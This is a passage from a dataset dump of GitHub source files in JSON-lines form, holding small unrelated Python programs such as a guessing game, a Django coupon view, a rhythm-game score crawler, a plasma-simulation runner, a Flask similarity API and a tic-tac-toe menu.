n:\n            continue\n        else:\n            val= r.randint(1,n)\n            break\n    except ValueError:\n        continue\n\nwhile True:\n    try:\n        guess = int(input('Guess: '))\n        if guess < 1 or 100 < guess:\n            continue\n        if guess == val:\n            print ('Just right!')\n            break\n        elif guess < val:\n            print ('Too small!')\n        elif guess > val:\n            print ('Too large!')\n\n    except ValueError:\n        continue\n    except EOFError:\n        break\n\n","repo_name":"OziMoa/CS50works","sub_path":"game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"44135193494","text":"# python3\n# pairs_with_sums.py - Finds pairs of integers in an array of integers that sum to a given value.\n\nfrom random import randint\nimport time\n\ndef find_int_pairs(section, given_sum, test=False):\n    \"\"\"\n    Helper function that does the iterating to find the pairs.\n    Added this as a brute force method to compare relative performance.\n    \"\"\"\n    int_pairs = set()\n\n    if test == True:\n        section = sorted(section)\n\n    for indx1, num1 in enumerate(section):\n        for indx2, num2 in enumerate(section):\n            if indx1 == indx2:\n                continue\n            if num1 + num2 == given_sum:\n                if (num2, num1) not in int_pairs:\n                    int_pairs.add((num1, num2))\n            elif num1 + num2 > given_sum:\n                break\n\n    return int_pairs\n\n\n\ndef pairs_with_given_sums(array, given_sum):\n    \"\"\"\n    Finds pairs of integers in an array of integers that sum to a given value.\n    \"\"\"\n    array = sorted(array)\n\n    mid_indx = round(len(array) / 2)\n    mid = array[mid_indx]\n    first = array[0]\n    last = array[-1]\n    \n    # Check how the value compares with the integers\n    if last * 2 < given_sum:\n        return None\n    elif first * 2 > given_sum:\n        return None\n\n    # When the 
integer pairs are all on the left half of the array\n elif mid > given_sum:\n left_half = array[:mid_indx]\n\n # If the given sum is very low, \n # this will divide the array in half until the\n # half point is smaller than the given sum.\n while mid > given_sum:\n mid_indx = round(len(left_half) / 2)\n mid = left_half[mid_indx]\n if mid > given_sum:\n left_half = left_half[: mid_indx]\n\n # If the given sum is less than the first \n array_mid_indx = len(left_half) - 1\n array_mid = left_half[array_mid_indx]\n diff_1 = array_mid - given_sum\n diff_2 = given_sum - mid\n if diff_1 > diff_2: \n while mid < given_sum:\n mid_indx += 1\n mid = left_half[mid_indx]\n left_half = array[: mid_indx + 1]\n else:\n while array_mid > given_sum:\n array_mid_indx -= 1\n array_mid = left_half[array_mid_indx]\n left_half = left_half[: array_mid_indx + 1]\n \n # Finds the integer pairs for the given section \n int_pairs = find_int_pairs(left_half, given_sum)\n\n # If the given_sum is less than the last element in the array, \n # this will lead to the most possible combinations\n elif last > given_sum:\n last_indx = len(array) - 1\n while mid > given_sum:\n last_indx -= 1\n last = array[last_indx]\n left_half = array[: last_indx + 1]\n \n # Finds the integer pairs for the given section \n int_pairs = find_int_pairs(left_half, given_sum)\n\n # When the integer pairs for the given_sum is somewhere near the middle\n elif mid * 2 > given_sum and last < given_sum:\n\n i = 0\n while first + mid < given_sum:\n i += 1\n first = array[i]\n middle = array[i - 1 : mid_indx + 1]\n\n # Finds the integer pairs for the given section \n int_pairs = find_int_pairs(middle, given_sum)\n \n # When the integer pairs are mostly in the right half of the array \n elif mid * 2 <= given_sum:\n\n i = 0\n while first + last < given_sum:\n i += 1\n first = array[i]\n right_half = array[i - 1:]\n\n # Finds the integer pairs for the given section \n int_pairs = find_int_pairs(right_half, given_sum)\n\n # if int_pairs is an empty set return None:\n if int_pairs != set():\n return int_pairs\n else:\n return None\n\n\n\ndef example():\n total_differences = []\n # Run both functions 10 times to compare performance\n for i in range(10):\n rand_array = []\n for i in range(0, 1000):\n\n x = randint(1, 100000)\n rand_array.append(x)\n\n given_sum = randint(0, 200000)\n print(given_sum)\n\n # Timing both function to see how my function compares to brute force method\n start = time.perf_counter()\n pairs_1 = pairs_with_given_sums(rand_array, given_sum)\n end = time.perf_counter()\n difference_1 = end - start\n\n start = time.perf_counter()\n pairs_2 = find_int_pairs(rand_array, given_sum, True)\n end = time.perf_counter()\n difference_2 = end - start\n \n # if pairs_2 != None and pairs_1 != None:\n # print(pairs_2 - pairs_1)\n differences = (difference_1, difference_2)\n total_differences.append(differences)\n\n function_1_avg_time = sum([diff[0] for diff in total_differences]) / len(total_differences)\n function_2_avg_time = sum([diff[1] for diff in total_differences]) / len(total_differences)\n print(f\"Function 1 took on avg: {function_1_avg_time} seconds, Function 2 took: {function_2_avg_time} seconds,\")\n \nif __name__ == \"__main__\":\n example()\n","repo_name":"GingerLee11/CCI_6ed","sub_path":"chapter_16/pairs_with_sums.py","file_name":"pairs_with_sums.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7286040196","text":"from 
django.contrib import messages\nfrom django.shortcuts import redirect\nfrom django.utils import timezone\nfrom django.views.decorators.http import require_POST\nfrom coupons.models import Coupon\nfrom coupons.forms.coupons import CouponApplyForm\nfrom cart.models import Cart\nfrom django.utils.translation import gettext_lazy as _\n\n\n@require_POST\ndef coupon_apply(request):\n now = timezone.now()\n url = request.META.get('HTTP_REFERER')\n form = CouponApplyForm(request.POST or None)\n if form.is_valid():\n try:\n code = form.cleaned_data.get('code')\n current_user = request.user\n cart = Cart.objects.get(user_id=current_user.id)\n cart.coupon = Coupon.objects.get(code__iexact=code,\n valid_from__lte=now,\n valid_to__gte=now,\n active=True)\n cart.save()\n messages.success(request, _(\"Купон успішно додано\"))\n return redirect(url)\n except Coupon.DoesNotExist:\n messages.info(request, _(\"Цього купону не існує\"))\n return redirect(url)\n","repo_name":"olievko/Djangoshop-PoliKram","sub_path":"coupons/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19333310205","text":"import websockets\nimport brotli\nimport json\n\nclear_list = ['Track Lost', 'Normal Clear', 'Full Recall', 'Pure Memory', 'Easy Clear', 'Hard Clear']\ndiff_list = ['PST', 'PRS', 'FTR', 'BYD']\n\nf = open('arc_namecache.txt', 'w')\nf.close()\n\n\ndef load_cache():\n cache = {}\n f = open('arc_namecache.txt', 'r')\n for line in f.readlines():\n ls = line.replace('\\n', '').split(' ')\n cache[ls[0]] = ls[1]\n f.close()\n return cache\n\n\ndef put_cache(d: dict):\n f = open('arc_namecache.txt', 'w')\n for key in d:\n f.write('%s %s\\n' % (key, d[key]))\n\n\ndef cmp(a):\n return a['rating']\n\n\ndef calc(ptt, song_list):\n best30_list = []\n best30_overflow = []\n brating = 0\n rall = 0\n for i in range(0, 40):\n if i <= 29:\n if i <= 9:\n try:\n rall += song_list[i]['rating']\n best30_list.append(song_list[i])\n brating += song_list[i]['rating']\n except IndexError:\n break\n else:\n try:\n best30_list.append(song_list[i])\n brating += song_list[i]['rating']\n except IndexError:\n break\n else:\n try:\n best30_overflow.append(song_list[i])\n except IndexError:\n break\n ball = brating\n brating /= 30\n rrating = 4 * (ptt - brating * 0.75)\n maxptt = ((ball + rall) / 40)\n return brating, rrating, maxptt, best30_list, best30_overflow\n\n\nasync def lookup(nickname: str):\n async with websockets.connect(\"wss://arc.estertion.win:616/\") as ws:\n await ws.send(\"lookup \" + nickname)\n buffer = \"\"\n while buffer != \"bye\":\n buffer = await ws.recv()\n if type(buffer) == type(b''):\n obj2 = json.loads(str(brotli.decompress(buffer), encoding='utf-8'))\n id = obj2['data'][0]['code']\n cache = load_cache()\n cache[nickname] = id\n put_cache(cache)\n return id\n\n\n\ndef best(id: str, num: int):\n if num < 1:\n return []\n result = []\n s = \"\"\n song_title, userinfo, scores = _query(id)\n s += \"%s's Top %d Songs:\\n\" % (userinfo['name'], num)\n for j in range(0, int((num - 1) / 15) + 1):\n for i in range(15 * j, 15 * (j + 1)):\n if i >= num:\n break\n try:\n score = scores[i]\n except IndexError:\n break\n s += \"#%d %s %s %.1f \\n\\t%s\\n\\tPure: %d(%d)\\n\\tFar: %d\\n\\tLost: %d\\n\\tScore: %d\\n\\tRating: %.2f\\n\" % (i+1, song_title[score['song_id']]['en'], diff_list[score['difficulty']], score['constant'], clear_list[score['clear_type']],\n score[\"perfect_count\"], 
score[\"shiny_perfect_count\"], score[\"near_count\"], score[\"miss_count\"], score[\"score\"], score[\"rating\"])\n result.append(s[:-1])\n s = \"\"\n return result\n\nasync def _query(id: str):\n cache = load_cache()\n # print(cache)\n try:\n id = cache[id]\n except KeyError:\n pass\n async with websockets.connect(\"wss://arc.estertion.win:616/\") as ws:\n await ws.send(id)\n buffer = \"\"\n scores = []\n userinfo = {}\n song_title = {}\n while buffer != \"bye\":\n try:\n buffer = await ws.recv()\n except Exception:\n return 0\n if type(buffer) == type(b''):\n # print(\"recv\")\n obj = json.loads(str(brotli.decompress(buffer), encoding='utf-8'))\n # al.append(obj)\n if obj['cmd'] == 'songtitle':\n song_title = obj['data']\n elif obj['cmd'] == 'scores':\n scores += obj['data']\n elif obj['cmd'] == 'userinfo':\n userinfo = obj['data']\n scores.sort(key=cmp, reverse=True)\n return song_title, userinfo, scores\n\ndef get_b30_dict(id, songtitle: dict, userinfo: dict, scores: list):\n b30_dict = {}\n ptt = userinfo['rating'] / 100\n brating, rrating, maxptt, best30_list, best30_overflow = calc(ptt, scores)\n best30_songinfo,best30_overflow_songinfo = get_b30_song_info(songtitle,scores)\n userinfo[\"code\"] = id\n b30_dict[\"best30_avg\"] = brating\n b30_dict[\"recent10_avg\"] = rrating\n b30_dict[\"theory_ptt\"] = maxptt\n b30_dict[\"account_info\"] = userinfo\n b30_dict[\"best30_list\"] = best30_list\n b30_dict[\"best30_overflow\"] = best30_overflow\n b30_dict[\"best30_songinfo\"] = best30_songinfo\n b30_dict[\"best30_overflow_songinfo\"] = best30_overflow_songinfo\n return b30_dict\n\ndef get_b30_song_info(songtitle: dict, scores: list):\n best30_songinfo = []\n best30_overflow_songinfo = []\n for i in range(0,40):\n if i <=29:\n songinfo={}\n sid = scores[i][\"song_id\"]\n name_en = songtitle[sid][\"en\"]\n note = scores[i][\"perfect_count\"] + scores[i][\"near_count\"] + scores[i][\"miss_count\"]\n songinfo[\"name_en\"] = name_en\n songinfo[\"note\"] = note\n songinfo[\"side\"] = 0\n best30_songinfo.append(songinfo)\n else:\n songinfo = {}\n sid = scores[i][\"song_id\"]\n name_en = songtitle[sid][\"en\"]\n note = scores[i][\"perfect_count\"] + scores[i][\"near_count\"] + scores[i][\"miss_count\"]\n songinfo[\"name_en\"] = name_en\n songinfo[\"note\"] = note\n songinfo[\"side\"] = 0\n best30_overflow_songinfo.append(songinfo)\n return best30_songinfo,best30_overflow_songinfo\n\nasync def b30(id: str):\n song_title, userinfo, scores = await _query(id)\n b30_dict = get_b30_dict(id, song_title,userinfo,scores)\n return b30_dict\n\ndef get_recent_songinfo(songtitle: dict, scores: list):\n songinfo = []\n song_info = {}\n sid = scores[0][\"song_id\"]\n name_en = songtitle[sid][\"en\"]\n note = scores[0][\"perfect_count\"] + scores[0][\"near_count\"] + scores[0][\"miss_count\"]\n song_info[\"name_en\"] = name_en\n song_info[\"note\"] = note\n song_info[\"side\"] = 0\n songinfo.append(song_info)\n return songinfo\n\ndef get_recent_dict(id, song_title: dict, userinfo: dict):\n recent_dict = {}\n songinfo = get_recent_songinfo(song_title, userinfo[\"recent_score\"])\n userinfo[\"code\"] = id\n recent_dict[\"account_info\"] = userinfo\n recent_dict[\"recent_score\"] = userinfo[\"recent_score\"]\n recent_dict[\"songinfo\"] = songinfo\n return recent_dict\n\nasync def recent(id: str):\n send = id\n send += \" -1 -1\"\n song_title, userinfo, scores = await _query(send)\n recent_dict = get_recent_dict(id, song_title, userinfo)\n\n return recent_dict\n\nclass Arcaea:\n\n @staticmethod\n async def 
run(operation, aid, num=0):\n result = []\n if operation == 'recent':\n try:\n s = await recent(aid)\n except Exception as e:\n s = [\"An exception occurred: %s\" % repr(e)]\n result.append(s)\n elif operation == 'best':\n try:\n s = await b30(aid)\n except Exception as e:\n s = [\"An exception occurred: %s\" % repr(e)]\n result.append(s)\n return result\n","repo_name":"guh0613/nonebot_plugin_arc0test","sub_path":"arcaea_crawler.py","file_name":"arcaea_crawler.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28768980072","text":"from brownie import World, accounts\nfrom civ.metadata import PLAYERS, WORLDS\n\n\ndef main():\n accounts.load(\"1\")\n players = list(PLAYERS.values())\n\n old_world = World.at(WORLDS[-2])\n new_world = World.at(WORLDS[-1])\n\n new_world.migrateWorld(old_world.address, { 'from': accounts[0] })\n new_world.migratePlayers(old_world.address, players, { 'from': accounts[0] })\n","repo_name":"f8n/fnd-civ","sub_path":"scripts/migrate_world.py","file_name":"migrate_world.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"71947688040","text":"import numpy as np\nimport libconf\nimport io\nfrom periodictable import deuterium, aluminum, nitrogen, tungsten\nimport subprocess as sp\nimport os\nimport shutil\nfrom os.path import join\n\ndef run_gitr(base_path, output_path, location_index, impurity_symbol):\n \"\"\"\n Launch GITR using subprocess.Popen and save output to the output folder.\n \"\"\"\n positions_file = f\"positions_{impurity_symbol}_loc_{location_index}.nc\"\n gitr_path = join(base_path, \"GITR\")\n positions_file_path = join(output_path, positions_file)\n \n print(\"Running Simulation!\")\n sp.Popen([gitr_path]).wait()\n \n shutil.copyfile(join(output_path, \"positions.nc\"), positions_file_path)\n os.remove(join(output_path, \"positions.nc\"))\n os.remove(join(output_path, \"positions.m\"))\n\ndef read_config(filename):\n \"\"\"Reads a configuration from a given filename.\"\"\"\n with io.open(filename, 'r') as f:\n return libconf.load(f)\n\ndef write_config(filename, config):\n \"\"\"Writes a configuration to a given filename.\"\"\"\n with io.open(filename, 'w') as f:\n libconf.dump(config, f)\n\ndef update_species_properties(filename, impurity_species, background_species, cell_index):\n \"\"\"Updates species properties in the input file.\"\"\"\n impurity_symbol = impurity_species.symbol\n ionization_file = f\"ADAS_Rates_{impurity_symbol}.nc\"\n particle_source_file = f\"particle_source_{impurity_symbol}_{cell_index}.nc\"\n \n try:\n config = read_config(filename)\n config['backgroundPlasmaProfiles'].update({'Z': background_species.number, 'amu': background_species.mass})\n config['impurityParticleSource']['initialConditions'].update({\n 'impurity_Z': impurity_species.number, 'charge': 0.0, 'impurity_amu': impurity_species.mass\n })\n config['impurityParticleSource']['ionization']['fileString'] = ionization_file\n config['impurityParticleSource']['recombination']['fileString'] = ionization_file\n config['particleSource']['ncFileString'] = particle_source_file\n write_config(filename, config)\n except (KeyError, IOError) as e:\n print(f\"Error updating species properties: {e}\")\n\n# Testing the function\nBASE_PATH = \"/Users/42d/GITR-1.3.0/build/\"\nOUTPUT_PATH = \"/Users/42d/MPEX-GITR-WallDYN/gitr/output\"\nFILENAME = 
\"/Users/42d/MPEX-GITR-WallDYN/gitr/input/gitrInput.cfg\"\nMATERIALS = [deuterium, aluminum, nitrogen, tungsten]\n\nfor material in MATERIALS:\n for cell_index in range(1, 95):\n update_species_properties(FILENAME, material, deuterium, cell_index)\n run_gitr(BASE_PATH, OUTPUT_PATH, cell_index, material.symbol)\n","repo_name":"ORNL-Fusion/MPEX-WallDYN","sub_path":"gitr/gitr_material_impact_simulations.py","file_name":"gitr_material_impact_simulations.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22278158016","text":"days = [0] * 366 # 365일 배열\n\nimport sys\ninput = sys.stdin.readline\nN = int(input())\n\nfor _ in range(N):\n S, E = map(int, input().split()) # 시작일, 끝일 받아오기\n for se in range(S, E+1):\n days[se] += 1 # 일정있는 일에 1개씩 늘이기\n\nrow = 0\ncol = 0\nans = 0\n\nfor d in range(1, 366):\n if days[d]:\n row = max(row, days[d])\n col += 1\n else:\n ans += row * col\n row = 0\n col = 0\nans += row * col # 365일에 해당하는 부분도 고려\n\nprint(ans)","repo_name":"cheon4050/CodingTest-Study","sub_path":"17주차/20207/nadonghyeon.py","file_name":"nadonghyeon.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34332537689","text":"import os\nimport sys\nimport warnings\nfrom ..conf import get_conf\n\n\ndef open_file(file, mode='r', encoding=None):\n \"\"\"\n Open a file and return a corresponding file object\n\n .. warning::\n\n This function is considered deprecated and will be removed\n in future versions of Magrathea.\n Use :py:func:`magrathea.utils.compat.comp_open` instead!\n\n :param str file: pathname of the file to be opened\n :param str mode: specifies the mode in which the file is opened\n :return: file object\n \"\"\"\n warnings.warn(\n \"The `file.open_file` function has been replaced by\"\n \"`compat.comp_open` and will be removed in future versions.\"\n \"Consider using `compat.comp_open` instead of `file.open_file`.\",\n category=DeprecationWarning\n )\n if sys.version_info < (3, 0, 0):\n return open(file, mode=mode)\n else:\n encoding = encoding or get_conf('DEFAULT_CHARSET')\n return open(file, mode=mode, encoding=encoding)\n\n\nclass File(object):\n \"\"\"\n Meta class providing methods for classes that have to deal with file system objects.\n \"\"\"\n\n @staticmethod\n def _check_access(path, mode):\n \"\"\"\n Checks if a file system object can be accessed in a specific mode.\n\n On platforms supporting effective user and group IDs, the tests are performed\n against the effective IDs in order to respecting an eventually set SUID bit.\n\n :param str path: name of the file system object to be tested\n :param int mode: access mode to be tested. 
Should be :py:data:`os.F_OK` to test the\n existence of *path*, or it can be the inclusive OR of one or\n more of :py:data:`os.R_OK`, :py:data:`os.W_OK`, and :py:data:`os.X_OK`\n to test permissions\n :returns: True if file system object can be accessed in the indicated mode, False if not.\n :rtype: bool\n \"\"\"\n if hasattr(os, 'supports_effective_ids') and os.access in os.supports_effective_ids:\n # noinspection PyArgumentList\n status = os.access(path, mode, effective_ids=True)\n else:\n status = os.access(path, mode)\n return status\n\n @staticmethod\n def _check_file_exists(file):\n \"\"\"\n Checks if a file system object exists and is a regular file.\n\n :param str file: name of the file system object to be tested\n :returns: True if file system object exists and is a regular file, False if not.\n :rtype: bool\n \"\"\"\n return os.path.exists(os.path.abspath(file)) and os.path.isfile(os.path.abspath(file))\n\n @staticmethod\n def _check_dir_exists(path):\n \"\"\"\n Checks if a file system object exists and is a directory.\n\n :param str path: name of the file system object to be tested\n :returns: True if file system object exists and is a directory, False if not.\n :rtype: bool\n \"\"\"\n return os.path.exists(os.path.abspath(path)) and os.path.isdir(os.path.abspath(path))\n","repo_name":"RootForum/magrathea","sub_path":"magrathea/utils/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73518830759","text":"from typing import List\n\nclass Solution:\n def maxSum(self, nums: List[int]) -> int:\n dict = {}\n ls = []\n for x in nums:\n max = 0\n for a in str(x): \n if int(a) > max: \n max = int(a)\n ls.append(max)\n max = -1\n for i in range(len(nums)): \n for j in range(i+1,len(nums)):\n if ls[i] == ls[j] and nums[i]+nums[j]>max:\n max = nums[i]+nums[j]\n return max \n \n\n#https://leetcode.com/problems/max-pair-sum-in-an-array/description/\n#You are given a 0-indexed integer array nums. You have to find the maximum sum of a pair of numbers from \n# nums such that the maximum digit in both numbers are equal. Return the maximum sum or -1 if no such pair exists.","repo_name":"MatjazM2020/codingWorkouts","sub_path":"maxPairSumInAnArray.py","file_name":"maxPairSumInAnArray.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"4049044765","text":"from __future__ import print_function # Ignore this line until next month\n# Section 1 of Lesson 4\n\n# We've already used functions in every part of the presentation thus far.\n# Each time we do print(...) we're using a function, but we haven't created\n# our own functions.\n\n# First let's talk about why functions are useful. Any time you're repeating\n# some block of code you're immediately writing way too much code. Remember in\n# our dictionaries lesson where we were doing\n# print(alpha_ordering.get('z', 'There is no letter that'),\n# \"comes after 'z' in the alphabet\")\n# And we had to copy and paste that for any other letter we wanted to give the\n# same treatement to? 
That would be the perfect candidate for a function.\n# Let's make this our first function.\n\n# First we'll bring our dictionary over here.\nalpha_ordering = {\n 'a': 'b',\n 'b': 'c',\n 'c': 'd',\n 'd': 'e',\n 'e': 'f',\n 'f': 'g',\n 'g': 'h',\n 'h': 'i',\n 'i': 'j',\n 'j': 'k',\n 'k': 'l',\n 'l': 'm',\n 'm': 'n',\n 'n': 'o',\n 'o': 'p',\n 'p': 'q',\n 'q': 'r',\n 'r': 's',\n 's': 't',\n 't': 'u',\n 'u': 'v',\n 'v': 'w',\n 'w': 'x',\n 'x': 'y',\n 'y': 'z',\n}\n\n\n# Now let's start writing our function. Functions are *def*ined and given\n# names. To create a function you start with \"def\" followed by the function\n# name. We'll call our function \"print_next_letter\". Function names have to\n# start with a letter (upper- or lower-case) or underscore (\"_\") and then can\n# be followed by a letter, number, or underscore. After the function we use\n# parentheses to start the list of arguments a function requires.\ndef print_next_letter(alphabet_dictionary, previous_letter):\n # Then we put the actual instructions for the function inside, indented\n # once.\n default = 'There is no letter that'\n # We can use a variable to store the default return value here.\n print(alphabet_dictionary.get(previous_letter, default),\n \"comes after '{0}' in the alphabet.\".format(previous_letter))\n\n\n# When defining our function we chose to require that the alphabet_dictionary\n# be provided as the first argument, and which letter we want to find the next\n# value for. Let's use it!\nprint_next_letter(alpha_ordering, 'a')\nprint_next_letter(alpha_ordering, 'z')\n# It works!\n# But there's something that's bothering me here. The output looks like:\n# \"b comes after 'a' in the alphabet.\"\n# and I would much rather it look like:\n# \"'b' comes after 'a' in the alphabet.\"\n# Let's make a new function that does this!\n\n\n# We'll call this one print_next_letter2\ndef print_next_letter2(alphabet_dictionary, previous_letter):\n default = 'There is no letter that'\n try:\n first_part = \"'{0}'\".format(alphabet_dictionary[previous_letter])\n except KeyError:\n first_part = default\n print(first_part,\n \"comes after '{0}' in the alphabet.\".format(previous_letter))\n\n\n# Let's see how that looks:\nprint_next_letter2(alpha_ordering, 'd')\nprint_next_letter2(alpha_ordering, 'z')\n\n# MUCH BETTER!\n\n# There are more advanced things we can do with functions so read on below.\n# The presentation will be moving on now because we're probably very close to\n# being out of time at this point.\n\n# Extra material\n\n\n# Function paramters (or arguments) can have default values. For example,\n# we don't really need to pass alpha_ordering in every time we want to print\n# the next letter in the alphabet. That would be really tedious after a while.\n# Let's make a new function.\ndef print_next_letter3(previous_letter, alphabet_dictionary=alpha_ordering):\n # So we don't end up copying and pasting code, let's reuse\n # print_next_letter2\n print_next_letter2(alpha_ordering, previous_letter)\n\n\n# Now let's use it\nprint_next_letter3('g')\nprint_next_letter3('z')\n\n# It works! Notice, though, that we had to change the ordering of the\n# arguments for this new function. Arguments with default values have to come\n# after arguments without default values. 
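# As a quick aside, reversing the order is rejected by Python. A definition like\n# def print_next_letter_bad(alphabet_dictionary=alpha_ordering, previous_letter):\n#     ...\n# raises 'SyntaxError: non-default argument follows default argument'.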
We can also create a new dictionary\n# for uppercase letters and still use print_next_letter3.\n\nupper_alpha_ordering = {}\nfor (key, value) in alpha_ordering.items():\n upper_alpha_ordering[key.upper()] = value.upper()\n\n# Now we can do any of the following:\nprint_next_letter3('I', alphabet_dictionary=upper_alpha_ordering)\nprint_next_letter3('M', upper_alpha_ordering)\n# Or\nprint_next_letter2(upper_alpha_ordering, 'Y')\n# Both are equivalent and both are correct.\n\n# I personally prefer either the first or the last to the second option. When\n# passing a value to an argument with a default value it is nice to name it\n# for your future self and for others.\n# In fact as long as you know the names of parameters, you can name each\n# parameter you pass. For example, we could write\n# print_next_letter2(upper_alpha_ordering, 'Y')\n# as\nprint_next_letter2(alphabet_dictionary=upper_alpha_ordering,\n previous_letter='Y')\n# In fact, if we're passing the values by name explicitly, we can even reorder\n# them!\nprint_next_letter2(previous_letter='Y',\n alphabet_dictionary=upper_alpha_ordering)\n\n# This does not mean we can do\n# print_next_letter2('Y', alphabet_dictionary=upper_alpha_ordering)\n# Or\n# print_next_letter2('Y', upper_alpha_ordering)\n\n# There is even more to learn about functions but we'll save that for another\n# time.\n","repo_name":"MadPUG/Introduction-To-Python","sub_path":"lesson_004/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"6819072431","text":"import riak\n\nclient = riak.RiakClient()\nbucket = client.bucket('s22009')\n\n\ndoc = bucket.new('doc', data={\n 'imie': 'Marcin',\n 'nazwisko': 'L',\n 'waga': 70,\n})\ndoc.store()\n\n\nprint('pobieranie')\nadded = bucket.get('doc')\n\nprint('wyswietlanie')\nprint(added.data)\n\nprint('')\nprint('modyfikacja wyswietlanie')\nadded.data['wzrost']=178\nadded.store()\nmodified = bucket.get('doc')\nprint(modified.data)\n\nprint('')\nprint('usuwanie')\nmodified.delete()\n\nprint('pobranie')\ndeleted = bucket.get('doc')\nprint(deleted.data)\n","repo_name":"MarcinLukaszuk/NBD","sub_path":"Zadanie8/zad9.py","file_name":"zad9.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71914640680","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\n\nfrom core.config import embedding_path, embedding_shape, get_algorithms, stemmer_path\nfrom core.embeddings.EmbeddingModelWrapper import EmbeddingModelWrapper\nfrom core.stemmer.SgjpStemmer import SgjpStemmer\n\nDEBUG = True\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\nCORS(app, resources={r'/*': {'origins': '*'}})\n\nembedding = EmbeddingModelWrapper(embedding_path, embedding_shape)\n\nstemmer = SgjpStemmer(stemmer_path)\n\n\n@app.route(\"/similarity\", methods=[\"GET\"])\n@cross_origin()\ndef get_similarity():\n algorithm_names = request.args['algorithms'].split(\",\")\n sentence_1 = request.args['s1']\n sentence_2 = request.args['s2']\n algorithms = get_algorithms(embedding, stemmer)\n data = [['Algorithm', \"Value\"]]\n data.extend(\n [[algorithms[name].get_label(),\n round(algorithms[name].normalized_score(sentence_1, sentence_2), 2)] for name in algorithm_names])\n return jsonify(data), 200\n\n\nif __name__ == '__main__':\n #app.run(host='0.0.0.0')\n 
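    # Note: host='0.0.0.0' (the commented-out line above) would expose the dev\n    # server on all interfaces; the default app.run() binds to 127.0.0.1 only.\n    # A hypothetical local request, assuming Flask's default port 5000:\n    #   GET http://127.0.0.1:5000/similarity?algorithms=alg1,alg2&s1=foo&s2=bar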
app.run()\n","repo_name":"cano112/wdsjn_sem_sim","sub_path":"core/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39314702832","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nN = int(input())\r\na = N//10\r\nb = N%10\r\ni = 0\r\n\r\nwhile True:\r\n    c = a + b\r\n    M = int(str(b) + str(c%10))\r\n    a = M//10\r\n    b = M%10\r\n    i += 1\r\n    print(M, i)\r\n    if int(N) == int(M): # couldn't the equality condition be checked with == while the values are still strings?\r\n        print(i)\r\n        break\r\n\r\n\r\n","repo_name":"2023cote/2022cote_jeonghyun","sub_path":"1110.py","file_name":"1110.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24710649788","text":"from game.menu.imenu import Menu\n\nclass TicTacToeMenu(Menu):\n    \"\"\"Main Tic-Tac-Toe Menu Class \"\"\"\n\n    def __init__(self, game):\n        super().__init__(game)\n        self.state = \"LPVP\"\n        self.local_game_x, self.local_game_y = self.middle_width, self.middle_height + 30\n        self.pve_game_x, self.pve_game_y = self.middle_width, self.middle_height + 50\n        self.credits_x, self.credits_y = self.middle_width, self.middle_height + 70\n        self.cursor_rect.midtop = (self.local_game_x + self.cursor_offset, self.local_game_y)\n\n    def display_menu(self):\n        self.run_display = True\n        while self.run_display:\n            self.game.check_events()\n            self.check_input()\n            self.game.display.fill(self.game.BLACK)\n            self.game.draw_text(\"Main Menu\", 24, self.game.WIDTH/2, self.game.HEIGHT/2 - 20)\n            self.game.draw_text(\"Local PvP Game\", 18, self.local_game_x, self.local_game_y)\n            self.game.draw_text(\"PvE Game\", 18, self.pve_game_x, self.pve_game_y)\n            self.game.draw_text(\"Author\", 18, self.credits_x, self.credits_y)\n            self.draw_cursor()\n            self.blit_screen()\n\n    def move_cursor(self):\n        \"\"\"Logic for moving the cursor\n\n        Set new cursor position, cursor sign and menu state according to chosen menu text\n        Menu navigation with down key and up key\n        \"\"\"\n        if self.game.DOWN_KEY:\n            if self.state == 'LPVP':\n                self.cursor_rect.midtop = (\n                    self.pve_game_x + self.cursor_offset, self.pve_game_y)\n                self.cursor = 'o'\n                self.state = 'PVE'\n            elif self.state == 'PVE':\n                self.cursor_rect.midtop = (\n                    self.credits_x + self.cursor_offset, self.credits_y)\n                self.cursor = 'x'\n                self.state = 'Credits'\n            elif self.state == 'Credits':\n                self.cursor_rect.midtop = (\n                    self.local_game_x + self.cursor_offset, self.local_game_y)\n                self.cursor = 'x'\n                self.state = 'LPVP'\n        elif self.game.UP_KEY:\n            if self.state == 'LPVP':\n                self.cursor_rect.midtop = (\n                    self.credits_x + self.cursor_offset, self.credits_y)\n                self.cursor = 'x'\n                self.state = 'Credits'\n            elif self.state == 'PVE':\n                self.cursor_rect.midtop = (\n                    self.local_game_x + self.cursor_offset, self.local_game_y)\n                self.cursor = 'x'\n                self.state = 'LPVP'\n            elif self.state == 'Credits':\n                self.cursor_rect.midtop = (\n                    self.pve_game_x + 